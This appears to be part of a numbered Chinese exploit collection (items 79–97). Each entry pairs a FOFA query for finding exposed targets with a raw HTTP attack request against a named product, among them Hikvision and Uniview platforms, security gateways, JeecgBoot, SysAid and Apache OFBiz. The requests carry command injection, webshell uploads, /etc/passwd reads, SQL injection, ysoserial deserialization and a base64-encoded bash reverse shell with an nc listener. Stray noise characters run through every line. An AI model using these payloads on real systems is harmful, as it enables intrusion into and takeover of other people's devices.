0 @1 S! f3 ]8 }7 R$ bPOST /Platform/System/FileUpload.ashx HTTP/1.1
$ z/ W: U% ^  Z( r; }( U; l2 ]9 WHost: x.x.x.x, v" j' b" E3 {4 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 y9 w" D  A) k. v# ]Connection: close" R$ W2 y! J5 n3 O, b
Content-Length: 336
0 k7 g; m; R0 ?5 m4 Y. qAccept-Encoding: gzip
* e/ e1 M% Y: D8 MContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
' x* j3 M6 i$ {4 B
/ j( ^9 n+ A% c5 |------YsOxWxSvj1KyZow1PTsh98fdu6l9 p6 j' o& R7 Q" @9 d8 U* R5 a2 g
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
, L$ r  k8 w- C$ X1 sContent-Type: image/png
6 Y. y4 Y+ L7 g/ u2 h& p! X! x) s
YsOxWxSvj1KyZow1PTsh98fdu6l) v* G0 y9 ^0 Z. A" e
------YsOxWxSvj1KyZow1PTsh98fdu6l" s) }- q8 g7 B8 q+ r, Q
Content-Disposition: form-data; name="target"( ^' p7 Z7 j6 x& f1 u: X, o, J
, |1 |* t. r$ k( ^) o! R9 I5 f
/Applications/SkillDevelopAndEHS/; n' G9 \+ P+ O: B! S* q$ X
------YsOxWxSvj1KyZow1PTsh98fdu6l--
) y& s+ l7 _, j. V- z6 j1 b* d4 D" O* E) |# \

( H' e% B3 u- E6 I7 \* v4 bGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
- o# f) g8 |. a# f" ]Host: x.x.x.x7 e4 O& G" k' w8 R% T, r

! z% N2 |, g4 p- V3 N5 m: S. c! ]
79. BYTEVALUE 百为流控路由器远程命令执行
7 R* o! \9 u+ Y! j8 G# IFOFA:BYTEVALUE 智能流控路由器/ o$ N; c- E+ |$ U6 D# S
GET /goform/webRead/open/?path=|id HTTP/1.15 K/ e" T# k# m& `; o
Host:IP6 R, T: V$ y" `8 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.03 h2 b' O; O6 A, Q* G, f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% w) c9 U- S/ o: ]: l6 ~8 `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ d) n$ _( V$ \' G/ uAccept-Encoding: gzip, deflate% _0 l6 F% s% h' T# ?: d
Connection: close  x3 ?- w  X  h9 u
Upgrade-Insecure-Requests: 17 l) O$ P+ d# n' U0 k+ d. Y* E
/ [  T  Q5 b7 \

! i" L' Z7 ^1 m: P( H3 T, G80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传2 @4 p- L% d' T+ S" w+ Q* r2 u
FOFA:app="速达软件-公司产品"& _/ L( [1 J! |# }
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1# P- h" W/ @8 `8 U" p& V5 ^8 l
Host: x.x.x.x; B$ h8 [8 n7 Z+ G! X. u/ d2 P+ p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ I3 O6 Q; E8 L3 Y) l6 l$ z. v
Content-Length: 27
3 F. ^; z/ G; p% i  ?5 U9 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* J5 B: U( W3 Y/ U* gAccept-Encoding: gzip, deflate9 O/ O; H8 T+ O. s& k$ A1 W  ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 w6 y0 m# V. A7 r: e
Connection: close2 j; }. z4 e3 I9 X
Content-Type: application/octet-stream+ b* k" v) G/ C3 Q; U. y/ F0 L
Upgrade-Insecure-Requests: 1
. ^! Z& Y, ]  C+ n0 o% V& D
* o  ]6 A. @: f- A: }<% out.print("oessqeonylzaf");%>( v& I6 @! S! p; j7 o; h' r6 @
, D$ u6 f9 }4 _  R6 n% V

& ?7 c5 g/ D1 L6 kGET /xykqmfxpoas.jsp HTTP/1.18 v; O; E" Y$ b  }0 l; ]
Host: x.x.x.x
- y) S! }! m. P5 ~- y  UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& m; C3 W7 F+ I. B' r2 xConnection: close$ b) B( A) D0 s. [! }# {
Accept-Encoding: gzip
8 f" u! C/ `! h( k; n$ A# s) Z  s" T5 l7 ^) y0 f

) M6 k1 P# B3 s! ]% o1 }81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
* q, Y$ p6 t1 {/ y! F2 U6 PFOFA:app="uniview-视频监控"6 ^- I0 I/ z/ x4 p
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1# a  K# }; m+ }/ j( Z' j+ s, t
Host: x.x.x.x! j) v. E( S& b! q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, l* M/ D6 Z. h% B4 l" u& r
Connection: close; S+ ]& m  g. \% b- u! p
Accept-Encoding: gzip5 p' X* ]: p: r
- P' ~2 J) J* Y3 ~" g# T4 N5 y; [. T; P

% ?+ l( h' k: K' {8 g+ }* Z82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行( n" b' k2 _7 f* ]1 A" ?  w
FOFA:app="思福迪-LOGBASE"
9 G4 P& r: F8 p  l9 c, C  o8 VPOST /bhost/test_qrcode_b HTTP/1.1: f4 d: C, G% S& }
Host: BaseURL# `& |# l7 G9 Z6 G% L
User-Agent: Go-http-client/1.1/ ^* Z) t7 ]& {1 C- V, m9 ]
Content-Length: 23
& _* r3 V3 N5 S- \2 uAccept-Encoding: gzip) z8 R) ~- o' z- \* t/ k/ j) v. v
Connection: close3 R4 F( a) f7 G* y. E& r( T1 Z; T8 \3 r
Content-Type: application/x-www-form-urlencoded
4 l6 \+ J$ k% n+ E8 _7 g' WReferer: BaseURL) e) |' D  G$ V: m" l5 b7 |/ }; T! C
) r: |+ @8 E* e; _
z1=1&z2="|id;"&z3=bhost& |9 }& R. |0 |$ s2 C
$ ?$ p% w0 s4 g3 [# o
: `( ?5 L# P: S. g0 c" t7 g
83. JeecgBoot testConnection 远程命令执行
4 r4 |( S$ o4 g! ?; ZFOFA:title=="JeecgBoot 企业级低代码平台"/ w  x' |& P' E
! ?; r: g, i2 s9 e7 z$ J  Y3 c

' N) q; o3 m& W6 j$ N. rPOST /jmreport/testConnection HTTP/1.1. w+ `+ _6 X1 y' ]' f7 D/ a7 T
Host: x.x.x.x' O9 g" ?7 g0 t5 u  U+ V$ M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, t2 {7 f5 W9 {+ Q, w2 h$ p, k
Connection: close  i) L9 b: c7 \) O
Content-Length: 8881' g1 f" Q! U1 S2 A5 W: J$ J
Accept-Encoding: gzip% s- {* P0 `2 K6 j
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
9 R+ `7 a* Q% ], PContent-Type: application/json: k% I3 r5 F2 g" A5 N
8 W5 j! r5 b' x; i9 L: g' N
PAYLOAD
0 {- h' ]$ w6 O3 Y7 ?( z
' W8 T9 D) v% R2 ~84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
4 W+ X+ w/ R) a1 ]( {/ }# }FOFA:title=="JeecgBoot 企业级低代码平台"
0 \7 g- Q9 f5 s/ i# L) W0 c
# S% M, Z+ w, J
) h2 D. T& `2 W3 p" }/ V" }' _/ [) Q# U8 D; v# @$ Y2 `) }
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.18 N5 p/ y5 P$ R2 u; V* k
Host: 192.168.40.130:8080' N! [6 d6 A8 M5 X( K  V
User-Agent: curl/7.88.1( n2 D4 l5 H0 q  x3 O% j5 j
Content-Length: 156( ]- s/ i2 j* W! t
Accept: */*
5 A  }1 \0 Z  J! [% \% w  ~Connection: close7 v. }5 {" \1 t
Content-Type: application/json
! U8 a; ?" E/ z& aAccept-Encoding: gzip( Z6 O- O0 q- \, P+ P
7 w& k" J" u8 E" g; Q
{
5 a% Z/ ~- z, k1 }5 n "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",3 T5 @0 b7 N5 U# \8 Q
  "type": "0"
8 w. U$ K: J2 B6 G}" w8 T8 N0 c( D- s' z
4 D9 {" l; d$ l, S; M
. f3 H+ p5 A/ c% K$ z, I, G6 s$ M
85. SysAid On-premise< 23.3.36远程代码执行1 W9 H  S8 A0 ~$ Y( d( r$ E0 k
CVE-2023-47246# g7 F7 v9 D6 Z, y! r9 D
FOFA:body="sysaid-logo-dark-green.png" 6 \$ b. T; \0 X7 _' d5 T( v
EXP数据包如下,注入哥斯拉马( z9 n! b. D1 u* B! X
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
0 p" ^% Q- _# `* xHost: x.x.x.x
4 X4 T6 H4 S% d$ j4 h, l! I/ uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! \1 `4 b/ l! ]( F  x) I% F
Content-Type: application/octet-stream# X( G' g: r# M$ V3 I  a7 _
Accept-Encoding: gzip# t* D) n9 \- w# F8 C, Y
7 ]* R. P5 y; p2 B3 Q
PAYLOAD: _9 u' |8 C; v6 y: ^2 T

% A! z$ o: m) `0 J回显URL:http://x.x.x.x/userfiles/index.jsp
3 a& G. Y1 l# c
+ m8 a. l; P1 d0 w5 t( u86. 日本tosei自助洗衣机RCE
9 G9 e2 D9 p2 Z7 x: MFOFA:body="tosei_login_check.php"
; d$ X8 _7 M3 K: N7 K, N$ EPOST /cgi-bin/network_test.php HTTP/1.1. v  Q# E! ~# d
Host: x.x.x.x! R6 x; J; z' o. i% G
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
5 T# L. C+ q6 vConnection: close
' d1 T2 a/ j, S4 R# jContent-Length: 44
% _4 N9 O" S7 @3 O7 c- FAccept: */*, K: B2 D* N# l1 V; @
Accept-Encoding: gzip- m- e6 L" ~2 o/ j* D# u  N
Accept-Language: en
& n8 E! w% D* O2 rContent-Type: application/x-www-form-urlencoded
+ {0 T7 b) q- \: [" i1 U0 v) N3 J9 d) j6 l9 z# |$ E$ t
host=%0acat${IFS}/etc/passwd%0a&command=ping% K- z  o3 |  V
! F6 B* v( R' A' m. K3 D9 q
  h9 I  v! W, _, U6 T
87. 安恒明御安全网关aaa_local_web_preview文件上传
6 l; g5 c1 a) L. E$ z7 n7 i: ~FOFA:title="明御安全网关"
5 i; j7 r% G3 c$ w, j6 @" HPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.11 Z, [* d3 X9 X: \6 U- e" Q
Host: X.X.X.X
* W% D$ f7 [6 m& BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" v! K$ g& X% u- LConnection: close
6 C) s3 A0 m/ T) Q" V4 iContent-Length: 198+ W* [, i  G' q  H  b+ T
Accept-Encoding: gzip
& a4 i& l5 i9 R, A2 I9 bContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd0 T2 D1 ~, E; ?0 p* g
) Z: Q" ~6 z9 X, }# R& X
--qqobiandqgawlxodfiisporjwravxtvd3 ?* I8 w6 |3 V
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"# I% Q% D6 Z0 v& V6 a  [1 M0 U
Content-Type: text/plain/ ?3 I- `6 W' T, r1 L- m; G
* I  y" c, v: Y# u
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
8 T- R) Q9 x4 g, t--qqobiandqgawlxodfiisporjwravxtvd--/ S- X: _. g* g+ T( R9 C' d3 J# B0 ]

: T/ R* \+ X7 y6 E  d" B7 W
. N% u1 q9 u9 U3 O6 s2 R/jfhatuwe.php; g3 I5 f  K4 b* D& \( T
. O; }9 c' e9 N) Q) ]& ~
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
  @7 y) k! `. m9 P" rFOFA:title="明御安全网关"
, P! ]3 u. \+ {+ H) c5 b! {4 Z, TGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
. k# L% m: S! w8 tHost: x.x.x.xx.x.x.x+ g1 D  Y: }: j" V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ Z8 `7 D# q5 p! LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, m8 S8 |) n  L
Accept-Encoding: gzip, deflate
& n/ k" J; N9 Z3 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& S  d/ Y, L# U* o# W' U" N
Connection: close
# {4 f: n) @( U- F( ^$ m$ M/ [8 x& {4 X- v

7 C$ }7 P0 b6 v/astdfkhl.php
  k( A7 Y* B6 _( S
1 i$ k( {0 k* n0 l89. 致远互联FE协作办公平台editflow_manager存在sql注入( f$ S" S/ b+ }' f* s( v+ _
FOFA:title="FE协作办公平台" || body="li_plugins_download"+ I7 a; N+ t3 L
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
: T6 i  _; L; p9 aHost: x.x.x.x! x8 o: p( L( B" P5 t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- o3 d  V6 Y/ M
Connection: close
$ x. x, E4 U* j0 O5 e( K7 f0 cContent-Length: 41
$ o: e$ w. g9 o* Q; uContent-Type: application/x-www-form-urlencoded' l. k# D6 R3 I, h
Accept-Encoding: gzip$ u* j4 |$ L, J6 J

" u5 i( V. o+ g- a6 q6 Z) e& [option=2&GUID=-1'+union+select+111*222--+- N  f. w. x- Y7 F6 Y9 D

! ^3 V: }* a) m
) I$ S" p+ H2 @# D% G90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行2 d6 C9 i- Y9 x$ v, E' K0 F+ R
FOFA:icon_hash="-1830859634"0 a3 K4 u- r0 R: d" A7 @
POST /php/ping.php HTTP/1.1
" w/ q) a% E+ b9 @1 {Host: x.x.x.x6 V; k. n+ y# q4 u" [! y% U9 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+ @! i+ y0 {+ u% jContent-Length: 51( L# X* ]# I* o/ h1 x) a( @
Accept: application/json, text/javascript, */*; q=0.01# w4 E! c7 Z! g* E' W4 J
Accept-Encoding: gzip, deflate
, W' ]7 w5 l# P; cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 o4 k+ a1 u6 C) a+ M4 ]6 _Connection: close4 k: D1 ~4 T; S4 c6 {
Content-Type: application/x-www-form-urlencoded
# V8 L) b, e3 HX-Requested-With: XMLHttpRequest7 q  O% e- L& G# U
3 [9 Z: n  Z5 f; G% j# {
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig3 ~% U  {" E; R3 ?+ ~
2 J3 }; w6 W7 F; I% b2 m

# p4 Q9 M& B. W2 ?) e$ Y91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
: Z) A& J! A* H  D+ p9 zFOFA:title="综合安防管理平台"$ u$ V2 Y7 D1 K4 x
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
- C2 U8 f+ ^: r7 W: _* gHost: your-ip
  u  z4 F* V. e; {  ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
0 v9 _) [8 y' ~3 F+ SAccept-Encoding: gzip, deflate
$ g+ X! ~2 A! K; b) uAccept: */*
& H+ H. x; w- k0 u9 b% lConnection: keep-alive
* C# [# w& \, B; y0 j& _4 ~* q9 L" F" M& W/ H( U/ o

1 O( h7 T& D0 w5 f* S* ?0 H" g4 ]$ O% h0 I6 B+ X3 p
92. 海康威视运行管理中心session命令执行
# T7 N# v" k( u0 R4 yFastjson命令执行
1 S- P8 @5 ^2 K$ Ohunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"4 ?2 J; \) v9 B' @% n' f
POST /center/api/session HTTP/1.17 g( n6 t' B0 Y, F
Host:. l) b3 G+ L2 U; c  b0 G7 |: b
Accept: application/json, text/plain, */*4 {2 }- |- L: `- D+ g9 f; }. O/ t
Accept-Encoding: gzip, deflate
6 E1 e* L& b& }3 p$ K: KX-Requested-With: XMLHttpRequest* h- c' N6 h4 p$ j4 J) k6 {, C& M
Content-Type: application/json;charset=UTF-8+ t6 `) C* m: f/ B8 j9 k
X-Language-Type: zh_CN) A3 S) H& \  [- N
Testcmd: echo test& _7 ^9 [, z) s5 ?* K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 ?9 ^2 ~& m* i9 G0 T4 JAccept-Language: zh-CN,zh;q=0.9
& S+ D, e7 N9 i1 K3 EContent-Length: 5778
: M# f5 _+ j+ U3 \! q: H/ V$ b7 O7 K4 O2 B
PAYLOAD
: Y7 i! f, O& ?2 {  M& t6 M2 A! i; ]7 q( k5 b) G* V! y" C! H

) R6 l/ ]5 n7 O' q( ^93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传- Y1 |# \) m/ h
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==", I% K( d2 J3 _) A
POST /?g=app_av_import_save HTTP/1.1# F* s) i2 H4 O7 B: z
Host: x.x.x.x
. M( {/ _% |# @4 |% K) ]& ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx% Y; f$ L8 ?4 X: E) H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) `4 W: U4 n* j: v) A% I5 C( z
# @, X0 g, Q' u
------WebKitFormBoundarykcbkgdfx. `  b, j+ k. X- e
Content-Disposition: form-data; name="MAX_FILE_SIZE". l5 T4 F! |! O( m
  Z' _+ g5 e2 P! Q/ ^" r- L
10000000$ L  m+ f9 z) o3 X2 I1 d
------WebKitFormBoundarykcbkgdfx
8 Y9 i/ U* k, {/ OContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"+ v- ^) F4 H+ S
Content-Type: text/plain
% f* d6 A' O% J% x# w: t3 `  {- s5 R' |
wagletqrkwrddkthtulxsqrphulnknxa
0 K0 n9 J6 p& f( X* o' N------WebKitFormBoundarykcbkgdfx
- B+ q4 z+ n  N: C1 P7 }7 [8 VContent-Disposition: form-data; name="submit_post"# z7 V0 _- v7 c' S0 q
/ ~1 d. P8 N* o" A
obj_app_upfile$ L+ b, A0 Q% m5 L
------WebKitFormBoundarykcbkgdfx( N- d1 T0 R( h: ^- k" H& d' ]
Content-Disposition: form-data; name="__hash__"
5 U( i8 g7 W6 }1 x
' p, m/ m& T* u& O0b9d6b1ab7479ab69d9f71b05e0e9445
  e* _; w6 @. P1 B3 n$ r& |6 @, U------WebKitFormBoundarykcbkgdfx--4 T6 h* l  d6 I# R" ?; t
  R3 R: \) a' j2 \+ ?, o

3 P- |; y6 C' j$ qGET /attachements/xlskxknxa.txt HTTP/1.1
. _% {4 Z2 R$ m* g" jHost: xx.xx.xx.xx
6 j5 `* N+ r8 f* ^7 MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 \2 @$ k, P) ~  t$ v6 t1 R4 z# ^+ c: `; G  k8 n

* Z3 z$ L# h+ n/ }1 v3 T94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
- z& q4 M! O' v: k1 p( c. T3 AFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
0 u  Z) k1 a! J- [7 a" }, K. v9 e0 BPOST /?g=obj_area_import_save HTTP/1.12 S. t* H4 s7 ?! q0 E# t4 I
Host: x.x.x.x
; A- N' Y- S; f8 |# cContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt/ ?9 j. H: `/ Z6 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; S; b3 n: y7 i% [0 O; r
# }9 }. o9 k. `( s------WebKitFormBoundarybqvzqvmt* w9 o: |2 u" z
Content-Disposition: form-data; name="MAX_FILE_SIZE"
, d# J0 j7 o5 `$ H  z& p6 o0 K# O9 {& P% E  T3 L
10000000
% {+ d: _( ]5 `- k, ^; L* E: t0 D2 U4 x------WebKitFormBoundarybqvzqvmt
8 |1 b/ R& u& h: n2 B2 G' DContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt") `; p6 }; b6 E+ U6 V& F) v+ W
Content-Type: text/plain7 x1 D* f/ f) e6 [! M) F

+ P, X$ ~6 D$ F! A! Rpxplitttsrjnyoafavcajwkvhxindhmu
" G' I2 I3 Y: `------WebKitFormBoundarybqvzqvmt6 n2 @  E. m- y$ c
Content-Disposition: form-data; name="submit_post"& o5 [' j, H0 f8 O& i

+ u( J+ K/ I+ c  b* P$ hobj_app_upfile7 h/ M/ {! j0 L) g
------WebKitFormBoundarybqvzqvmt, P. x; ~) k- h3 [! @8 E' b
Content-Disposition: form-data; name="__hash__". O( X! w0 i# F* ~

" U; B" q% o& _& y; s' u$ A0b9d6b1ab7479ab69d9f71b05e0e94451 x; G5 Z% y4 e
------WebKitFormBoundarybqvzqvmt--$ y- m1 e& r5 j+ H2 `* Y. I8 s0 Z

! {8 s+ ]. C/ l2 v0 [7 C; a9 G) z; g( Q" s; q! _- _* o
; V# [2 y, H% U& h6 r  p
GET /attachements/xlskxknxa.txt HTTP/1.14 ^2 a* r; j" D' d+ k; h3 t
Host: xx.xx.xx.xx
: E* r; s! U6 I( U# @User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) V, F, B2 I3 Q0 f' `+ O' g" O
4 E7 _3 Z! }) P; L' x# p" f' E: Y

7 w/ R- d+ f" `- S" T95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
3 T5 U2 T6 ^% S: ?% g3 tCVE-2023-49070# z* a3 s9 Y5 g2 }1 _4 x
FOFA:app="Apache_OFBiz"# i6 v3 m2 H5 ?8 A! A
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
$ R; p. }* U& V: s: |7 mHost: x.x.x.x
* ^" u1 i% P+ V9 [9 K/ [6 P3 z& [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' g8 W/ t- m$ M& q/ _2 y2 xConnection: close7 `6 R% J( d4 }! Z0 d* `/ S
Content-Length: 889
" \7 y/ R3 A* P+ j" ~5 mContent-Type: application/xml
9 n2 R# z% {6 DAccept-Encoding: gzip
5 S4 l; i2 j  h, T+ @! G7 _; h) R- f
<?xml version="1.0"?>
& Q' v" F0 `" z4 T; l+ S( m<methodCall>
8 g! U3 \0 ]8 k* m8 {3 X' @: p   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>9 v+ L0 P' k( L. t
    <params>  Z- p  [+ |% {" p% t  X9 j  |9 Q
      <param>2 W1 n7 P" j0 l: V6 [# X2 t  |& u
      <value>
0 x8 ^* n- s9 [4 d        <struct>: _0 E+ z! x5 R
       <member>
. v' r2 n1 J: v+ Z7 L* v          <name>test</name>- J4 H9 K/ G. \3 S' F) B
          <value>/ O- i' h/ R# h0 `
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>) A9 m/ g) q$ h3 c6 Z
          </value>; a! }3 X; ~3 @! G
        </member>1 h- y8 f4 h3 K( P6 l8 |; F8 C
      </struct>
$ ]& e% u" s2 s4 N      </value>* H6 l# @$ w3 ]4 Z
    </param>
4 X7 P" X6 Q3 h: W3 W1 M2 j: n    </params>
2 D3 ^: ^* Z: G9 z</methodCall>! U% T( @. }7 L& |  z

6 k7 P7 c( U3 ]9 G3 v' |
) E- Y# l3 g9 j$ h用ysoserial生成payload
- O$ T) n, ?3 P8 kjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
  p2 U& b: y, D0 n) F) n$ B- e0 O; X. Z8 B. d$ U9 |
$ h5 q, q4 a, F+ \( b
将生成的payload替换到上面的POC6 }& M: f! j; w$ N, R' w
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
: s# a5 q" I/ C: R0 y$ x7 A$ ~2 h& i4 BHost: 192.168.40.130:8443
5 Y/ V& j$ [: f% E' b0 XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.362 P; v+ m( F- ^, y/ h
Connection: close
% [) _: u3 D1 g. c) pContent-Length: 889
9 ?' f: G. l+ x" dContent-Type: application/xml
/ z: ?" B& A% X% D7 hAccept-Encoding: gzip
9 c& s! o+ [+ t% n% ]  c
2 G# R2 |, e1 w5 m& gPAYLOAD9 T& a  ^3 o8 _8 e, q( H3 |
6 @* j( p9 U" y( W% }
96. Apache OFBiz  18.12.11 groovy 远程代码执行
/ D) q! w: ~: Z, g; ?' ]: YFOFA:app="Apache_OFBiz"4 H$ i+ Y+ _" H' y% i# Q( i. A
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.13 g5 k+ m) x0 z  g  p
Host: localhost:8443
" _) @9 z  ?( G# c0 K! QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- `/ g6 N0 n# ^( Y
Accept: */*& X% F, X# @! h6 M) p. o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; n3 ^* @4 `" g$ ]" C, z: DContent-Type: application/x-www-form-urlencoded& \. Y$ {6 I5 ~
Content-Length: 552 b$ q7 m% [" Z) V2 q" v1 g6 m/ ]
4 n* g5 r1 \/ r0 t& T6 t) b
groovyProgram=throw+new+Exception('id'.execute().text);" {1 C8 ?1 M  v

/ E9 ?+ C% o; G# e, n  M; O2 v( d7 W) O
反弹shell- I0 q* d7 f& B
在kali上启动一个监听. ~2 j% \% B6 {: M( t6 {
nc -lvp 7777
$ q. @7 b& D: v0 L* F
$ x. I& c' E2 L2 I  L: H% FPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1% Y3 [' p: x# ^8 l& O/ m' D; n9 x
Host: 192.168.40.130:8443) F1 n8 V5 D; u8 k& K; ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, K: G& `$ f4 A  f) D* [. \, }
Accept: */*( o& `* Q7 J$ `* T' g# T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 u0 Q$ c$ c" W' fContent-Type: application/x-www-form-urlencoded
0 L" \! x. y$ p) [1 `6 ^Content-Length: 71' y: s) H6 E2 D9 m+ ^9 l% n5 f2 L

" a, F+ o) `6 a8 o3 FgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
3 T! k+ l/ N! Z, c( y0 z2 t, B; n
( E6 h: Y3 g. i9 l& R97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行- _) ?9 s& C$ K/ {0 k- G1 k
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
- Q- @5 ^3 ~6 A5 w9 s$ h9 CGET /passport/login/ HTTP/1.1
7 H2 T# ?7 R' f9 L7 CHost: 192.168.40.130:8085
